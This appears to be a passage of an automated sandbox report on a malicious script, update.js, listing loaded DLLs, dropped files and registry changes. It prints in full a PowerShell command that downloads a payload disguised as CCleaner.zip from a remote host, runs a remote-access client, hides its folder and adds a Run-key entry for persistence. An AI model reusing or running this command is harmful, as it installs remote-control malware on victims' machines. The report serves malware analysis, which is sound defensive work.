                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: pcicl32.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: shfolder.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: pcichek.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: pcicapi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: samcli.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: dbgcore.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: nsmtrace.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: nslsp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: devobj.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: pcihooks.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: winsta.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: riched32.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: riched20.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: usp10.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: msls31.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: pciinv.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: firewallapi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: fwbase.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\RYMB15\NSM.ini
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: update.jsStatic file information: File size 4058589 > 1048576
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll

                      Data Obfuscation

                      barindex
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\client32.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BCYLGMFSMV
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BCYLGMFSMV
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
